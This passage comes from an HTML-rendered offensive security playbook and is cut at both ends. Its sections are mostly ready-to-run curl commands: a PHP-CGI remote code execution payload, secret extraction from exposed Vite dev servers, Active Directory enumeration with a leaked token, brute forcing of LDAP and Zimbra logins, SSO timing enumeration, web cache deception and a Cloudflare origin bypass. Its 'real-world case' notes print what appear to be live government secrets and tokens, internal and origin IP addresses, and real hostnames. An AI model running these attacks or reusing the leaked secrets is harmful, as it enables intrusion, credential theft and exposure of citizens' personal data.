&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RCE payload: ?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dphp://input  (PHP code in the POST body)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="255-vite-dev-server--full-source-code-exposed" &gt;
&lt;div&gt;
&lt;a href="#255-vite-dev-server--full-source-code-exposed"&gt;
##
&lt;/a&gt;
25.5 Vite Dev Server — Full Source Code Exposed
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Check if Vite is in dev mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/env.ts&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Contains VITE_JWT_SECRET, VITE_API_TOKEN in plain text!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Check Dockerfile (CMD npm run dev -- --host = DEV in production!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/Dockerfile&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Enumerate ALL source files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/package.json&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# dependencies, scripts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vite.config.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# build configuration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tsconfig.json&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# paths, aliases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/lib/axios.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# HTTP client with API URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/api/*.ts&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# ALL endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Extract secrets from source files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/src/env.ts&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;(?:SECRET|KEY|TOKEN|PASSWORD)\s*[:=]\s*[&amp;#34;\&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;][&lt;/span&gt;^&lt;span style="color:#a6d189"&gt;&amp;#34;\&amp;#39;]+&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — server in Vite dev mode:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;45 TypeScript files served publicly&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_JWT_SECRET=b0c1df0e3f9c1e858d3bb0b8d58a119&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_API_TOKEN=0bd85d3032b8e93137fe83c3b729eb90&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VITE_LDAP_AUTH=https://environment.gov.br&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Dockerfile: &lt;code&gt;CMD npm run dev -- --host&lt;/code&gt; (DEV in production!)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="256-active-directory-via-token-in-public-html" &gt;
&lt;div&gt;
&lt;a href="#256-active-directory-via-token-in-public-html"&gt;
##
&lt;/a&gt;
25.6 Active Directory via Token in Public HTML
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Search for tokens/authkeys in login page HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://interativa.TARGET.com/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;(?:authkey|token|apiKey)[&amp;#34;\&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;?&lt;span style="color:#8caaee"&gt;\s&lt;/span&gt;*&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;:&lt;span style="color:#99d1db;font-weight:bold"&gt;=]&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\s&lt;/span&gt;*&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;\&amp;#39;][a-f0-9]{32,40}&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 2. If a token is found, test it against the LDAP API
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;TOKEN=&amp;#34;&lt;/span&gt;4d37b3545106aae4622122b7ce395d4e&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/filtered-users?page&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;1&amp;amp;&lt;span style="color:#f2d5cf"&gt;limit&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;1000&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# → 389 AD users: sAMAccountName, displayName, email, DN, groups
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 3. List AD groups
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/groups&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# → 200 groups with full OU structure
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 4. AD details (pwdLastSet, userAccountControl, memberOf)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/users&lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# 5. Test credentials (UNLIMITED brute force if no rate limit)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;curl -X POST &amp;#34;&lt;/span&gt;https://environment.TARGET.com/api/auth&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -H &amp;#34;&lt;/span&gt;AuthorizationApi: &lt;span style="color:#f2d5cf"&gt;$TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -H &amp;#34;&lt;/span&gt;Content-Type: application/json&lt;span style="color:#a6d189"&gt;&amp;#34; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; -d &amp;#39;{&amp;#34;&lt;/span&gt;username&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;admin&lt;span style="color:#a6d189"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;password&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;password&lt;span style="color:#a6d189"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;&amp;#34;:&amp;#34;&lt;/span&gt;0.0.0.0&lt;span style="color:#a6d189"&gt;&amp;#34;}&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;# If 200 → valid credential; if 401 → invalid (enumeration!)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: State government — token &lt;code&gt;4d37b35...&lt;/code&gt; found in intranet HTML:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;389 AD users extracted with names, emails, groups&lt;/li&gt;
&lt;li&gt;200 AD groups mapped with full OU structure&lt;/li&gt;
&lt;li&gt;4 Domain Admins identified&lt;/li&gt;
&lt;li&gt;UNLIMITED brute force endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="257-self-hosted-gitlab--public-repos" &gt;
&lt;div&gt;
&lt;a href="#257-self-hosted-gitlab--public-repos"&gt;
##
&lt;/a&gt;
25.7 Self-Hosted GitLab — Public Repos
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. List all public projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects?visibility=public&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Read raw files via API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects/{NAMESPACE}%2F{REPO}/repository/files/{PATH}/raw?ref=main&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check open registration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/users/sign_up&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 → anyone can create an account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Check Container Registry (Docker images)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.TARGET.com/api/v4/projects/{ID}/registry/repositories&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — GitLab with 3 public repositories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Full Internal Helpdesk (HDI) source code&lt;/li&gt;
&lt;li&gt;&lt;code&gt;servidores_sigrh.json&lt;/code&gt;: 461,304 records with CPF (SSN), registration&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.env.example&lt;/code&gt;: MongoDB host, LDAP, email server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;deploy.sh&lt;/code&gt;: Internal IP 10.11.82.75, blue/green strategy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.gitlab-ci.yml&lt;/code&gt;: CI/CD tokens, runners&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="258-sso-timing-based-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#258-sso-timing-based-user-enumeration"&gt;
##
&lt;/a&gt;
25.8 SSO Timing-Based User Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Measure response time to validate user existence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com/password&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;user[email]=admin@target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;admin@target.com: %{time_total}s\n&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ~0.896s (user EXISTS — backend queries DB)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com/password&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;user[email]=nonexistent999@target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;nonexistent@target.com: %{time_total}s\n&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ~0.572s (user does NOT EXIST)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Difference &amp;gt; 200ms = timing oracle confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="259-zimbra-soap-auth--brute-force-test" &gt;
&lt;div&gt;
&lt;a href="#259-zimbra-soap-auth--brute-force-test"&gt;
##
&lt;/a&gt;
25.9 Zimbra SOAP Auth — Brute Force Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.webmail.com/service/soap/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;soap:Envelope xmlns:soap=&amp;#34;http://www.w3.org/2003/05/soap-envelope&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;soap:Header&amp;gt;&amp;lt;context xmlns=&amp;#34;urn:zimbra&amp;#34;/&amp;gt;&amp;lt;/soap:Header&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;soap:Body&amp;gt;&amp;lt;AuthRequest xmlns=&amp;#34;urn:zimbraAccount&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;account by=&amp;#34;name&amp;#34;&amp;gt;admin@TARGET.com&amp;lt;/account&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;password&amp;gt;PASSWORD&amp;lt;/password&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/AuthRequest&amp;gt;&amp;lt;/soap:Body&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/soap:Envelope&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;account.AUTH_FAILED&amp;#34; → functional endpoint, brute force possible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;account.AUTH_EXPIRED&amp;#34; → correct credential but expired account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2510-wcd-in-angular-spas-catch-all-routing" &gt;
&lt;div&gt;
&lt;a href="#2510-wcd-in-angular-spas-catch-all-routing"&gt;
##
&lt;/a&gt;
25.10 WCD in Angular SPAs (Catch-All Routing)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Angular SPAs return &lt;code&gt;text/html&lt;/code&gt; for ANY path (catch-all routing). If the CDN caches paths ending in static extensions, authenticated pages are cached as public resources:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Confirm the SPA returns HTML for any path&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://admin.TARGET.com/dashboard/settings.css&amp;#34;&lt;/span&gt; -D - | grep content-type
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# content-type: text/html (NOT text/css!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. If X-Cache: HIT → WCD confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker sends victim to: https://admin.TARGET.com/dashboard.css&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (authenticated) → CDN caches HTML with the victim&amp;#39;s data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker accesses the same URL → receives the victim&amp;#39;s authenticated HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2511-staging-ip-bypass-cloudflare-bypass" &gt;
&lt;div&gt;
&lt;a href="#2511-staging-ip-bypass-cloudflare-bypass"&gt;
##
&lt;/a&gt;
25.11 Staging IP Bypass (Cloudflare Bypass)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Staging subdomains behind Cloudflare can be accessed directly via the origin IP:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Discover the real IP (DNS history, crt.sh, SecurityTrails)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Access directly with --resolve&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk --resolve &lt;span style="color:#a6d189"&gt;&amp;#34;hmgadmin.TARGET.com:443:51.222.42.163&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://hmgadmin.TARGET.com/&amp;#34;&lt;/span&gt; -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 → bypass confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Staging frequently has:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - APP_DEBUG=true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Fewer WAF rules&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Weaker authentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Real staging data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2512-php-fpm-status-page--real-time-intelligence" &gt;
&lt;div&gt;
&lt;a href="#2512-php-fpm-status-page--real-time-intelligence"&gt;
##
&lt;/a&gt;
25.12 PHP-FPM Status Page — Real-Time Intelligence
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires correct Host header and a browser User-Agent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: cp2.rx.ritux.com.br&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
